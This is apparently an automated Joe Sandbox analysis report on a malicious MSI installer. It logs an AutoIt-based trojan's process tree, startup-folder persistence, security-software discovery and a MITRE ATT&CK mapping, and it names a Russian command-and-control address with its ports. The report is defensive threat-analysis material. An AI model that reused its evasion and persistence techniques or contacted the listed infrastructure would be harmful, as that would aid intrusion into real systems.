Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe

Source: Autoit3.exe, 00000008.00000003.562124824.0000000004685000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004474000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.565469736.0000000000A36000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerabad\V
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager8.6
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerST
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617261525.00000000063BE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerkeabad
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerabad\
Source: Autoit3.exe, 00000008.00000002.566996482.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.568412536.0000000004958000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.566222341.0000000001337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: cmd.exe, 00000009.00000002.617175946.000000000627E000.00000004.00000010.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617463634.000000000693E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerVGg
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerkeabad;
Source: SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820725792.0000000009CAE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820504444.00000000095EE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: tProgram Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerVG
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager
Source: cmd.exe, 00000009.00000003.580764198.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.582186478.00000000033E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerisoft
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager<

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\cmd.exe

Code function: RegOpenKeyExA,GetLocaleInfoA,LoadLibraryExA,LoadLibraryExA,

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\fkeabad\Autoit3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00451190 GetUserNameA,

Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: superantispyware.exe

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00428120 bind,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	11 Peripheral Device Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	112 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 Services File Permissions Weakness	2 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Services File Permissions Weakness	1 DLL Side-Loading	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	111 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	11 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Masquerading	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Services File Permissions Weakness	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
15e7232gfN.msi	2%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\ProgramData\fkeabad\Autoit3.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)	3%	ReversingLabs
C:\Windows\Installer\MSI3433.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDAD.tmp	0%	ReversingLabs
C:\temp\AutoIt3.exe	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://80.66.88.145:9999d	0%	Avira URL Cloud	safe
http://80.66.88.145&	0%	Avira URL Cloud	safe
http://80.66.88.145:7891/	6%	Virustotal		Browse
http://80.66.88.145:9999n	0%	Avira URL Cloud	safe
http://80.66.88.145:9999l	0%	Avira URL Cloud	safe
http://80.66.88.145	7%	Virustotal		Browse
http://80.66.88.145	0%	Avira URL Cloud	safe
http://80.66.88.	0%	Avira URL Cloud	safe
http://80.66.88.145:7891/	0%	Avira URL Cloud	safe
http://80.66.88.145:9999pT$	0%	Avira URL Cloud	safe
http://80.66.88.145:9999	0%	Avira URL Cloud	safe
http://80.66.88.145:7891	0%	Avira URL Cloud	safe
http://80.66.88.145:9999x	0%	Avira URL Cloud	safe
http://80.66.88.145:9999hd	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://80.66.88.145:7891/	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://80.66.88.145	cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	false		high
http://80.66.88.145:9999d	SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.145&	Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.145:9999	SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://80.66.88.145:9999n	SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.145:9999l	cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.	SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.autoitscript.com/autoit3/	Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	false		high
http://80.66.88.145:7891	cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://80.66.88.145:9999pT$	cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.145:9999x	cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://80.66.88.145:9999hd	SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
80.66.88.145	unknown	Russian Federation		20803	RISS-ASRU	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1280109
Start date and time:	2023-07-26 13:59:55 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 38s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	15e7232gfN.msi
Original Sample Name:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
Detection:	MAL
Classification:	mal64.troj.evad.winMSI@51/27@0/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 97.3%) Quality average: 78.9% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .msi Close Viewer

Warnings

Exclude process from analysis (whitelisted): audiodg.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:01:03	API Interceptor	4x Sleep call for process: Autoit3.exe modified
14:01:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk
14:01:08	API Interceptor	13x Sleep call for process: cmd.exe modified
14:02:03	API Interceptor	35x Sleep call for process: SciTE.exe modified
14:02:27	API Interceptor	1x Sleep call for process: MyProg.exe modified

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

Source: http://80.66.88.145:7891/	Virustotal: Detection: 5%			Perma Link
Source: http://80.66.88.145	Virustotal: Detection: 6%			Perma Link

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
